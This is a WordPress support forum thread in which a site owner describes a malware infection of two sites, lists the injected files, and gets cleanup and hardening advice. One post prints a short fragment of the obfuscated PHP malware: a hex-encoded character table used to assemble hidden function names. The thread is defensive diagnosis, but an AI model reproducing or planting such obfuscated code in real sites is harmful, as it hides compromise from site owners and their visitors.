Title: malicious code inject
Last modified: October 9, 2017

---

# malicious code inject

 *  [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/)
 * I have the latest WP version and just had a malicious code injection.
 * I wonder, how can that happen, and what can be done for future protection?
 * On 2 domains some directories had been tempered with and had a brand new change
   date.
 * They were on one domain:
    wp-content/themes/twentysixteen wp-content/themes/twentysixteen/
   template-parts
 * The twentysixteen theme was installed, but another theme was active. It was updated
   to the latest version though (WP updates themes no matter they are active or 
   not)
 * The other domain:
    wp-includes/rest-api wp-content/plugins/wp-members/admin
 * wp-members is popular plugin that gets often updated?
 * So how to prevent such malicious code injections? Or if they happen, how to notice
   them?

Viewing 14 replies - 1 through 14 (of 14 total)

 *  [wosley24](https://wordpress.org/support/users/wosley24/)
 * (@wosley24)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9568424)
 * During the development stage..Did you discourage search engines?
    When you were
   done developing the site…Did you install a Security plugin?
 * Did you delete all the unused plugins?
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9568478)
 * I installed WP from a docker (shared hosting). I have no security plugin though,
   I just saw that there are such plugins.
 *  [bsolutionsk](https://wordpress.org/support/users/bsolutionsk/)
 * (@bsolutionsk)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9571387)
 * Is the website hacked or has a code, whats the website address
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9573107)
 * Some more details. 2 Sites got hacked. Both were 4.8.2 with all updates. One 
   was just about 1 week old.
 * They put a file called ssegtj.zip in the root directory.
 * In it are
 * /goren/ > 14 files
    /hopeir/ > 15 files .htaccess otiarw.php vrairue.php
 * I wonder how they managed to get that on the site?
 * In the meantime I installed the sucuri plugin and I hope that can help a little.
   Can’t it?
 *  [Adam](https://wordpress.org/support/users/adamlachut/)
 * (@adamlachut)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9573143)
 * Sucuri in free version and other security plugins (like Wordfence) in free versions
   probably won’t help too much.
 * You need to assume that it’s compromised hosting account, not single domain or
   directory, so IMHO you need to start with blocking an access to this hosting 
   account, change all credentials and clean it file by file. If you have more WP(
   or other CMSes installed), you need at least update all of them.
 * Adam
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9586065)
 * Correct, Sucuri didn’t do anything. I got another malicious code injection.
 * They install code and send SPAM from the infected domain.
 * Any hints how to prevent that are appreciated.
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9586213)
 * I found favicon****.ico files that contained PHP code, that certainly can’t be
   right or?
 * Also found 2 scrips the SPAM delivery identified as ‘sender’:
 * /public_html/domain01.coms/wp-content/advanced-cache.php
 * /public_html/domain01.org/wp-admin/js/widgets/xackoaqb.php
 * xackoaqb.php was a very new file, but advanced-cache.php was a few month old.
 * What is best now? Completely delete and reinstall the domains?
 *  [ehutorny](https://wordpress.org/support/users/ehutorny/)
 * (@ehutorny)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9588336)
 * Today I noticed many links in search results with otiarw.php in URLs and it seems
   that all of them redirect to malicious sites. I’ve searched Google for otiarw.
   php and there are 2,890,000 results. Root URLs of sites, that I’ve randomly checked
   either works OK of fail with a PHP error. All that I’ve checked has wp-admin 
   page
 *  [B1000](https://wordpress.org/support/users/cvoicu/)
 * (@cvoicu)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9592030)
 * Similar issue here (spam, malicious files and malicious code in themes header).
   WordPress was updated to the latest stable version but I can’t tell for sure 
   that the issue started after the update of prior to it, because some domains 
   have older malicious files than the update, while on other domains the malicious
   files are newer than the update.
    For the moment we were not able to determine
   where the vulnerability is coming from but the code is doing a lot of things 
   so I guess that completely deleting and reinstalling is a good start.
 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9592040)
 * side note to [@cvoicu](https://wordpress.org/support/users/cvoicu/),
 * If the troubleshooting already discussed made no difference for you, then, as
   per the [Forum Welcome](https://make.wordpress.org/support/handbook/forum-welcome/),
   please [post your own topic](http://wordpress.org/support/forum/how-to-and-troubleshooting#postform).
 *  [B1000](https://wordpress.org/support/users/cvoicu/)
 * (@cvoicu)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9592072)
 * [@t-p](https://wordpress.org/support/users/t-p/) I don’t think there’s need to
   post my own topic as I’ve basically replied to yellofish’s question about what
   should he do next. Thanks!
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9593448)
 * I deleted quite a lot of PHP files with base64 script in it. I can see plenty
   of hits looking for exactly those files from various IPs. I also installed Wordfence
   and did a scan (it needed .htaccess modification due to LiteSpeed). I guess I
   am pretty OK for now.
 * Another thing I did is renaming the /wp-content/ folder to something else. That
   will irritate the bots that look for certain plugins for a while (I hope).
 * Below just some idea how one of those (non base64) look like:
 *     ```
       <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
       $GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];
       ```
   
 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9595282)
 * If you believe your site is hacked, carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
 *  [mllbrnk](https://wordpress.org/support/users/mllbrnk/)
 * (@mllbrnk)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9601523)
 * Just came across similar issues. Found two users in the database with admin rights(
   one from three years ago) that wasn’t supposed to be there

Viewing 14 replies - 1 through 14 (of 14 total)

The topic ‘malicious code inject’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 14 replies
 * 8 participants
 * Last reply from: [mllbrnk](https://wordpress.org/support/users/mllbrnk/)
 * Last activity: [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9601523)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics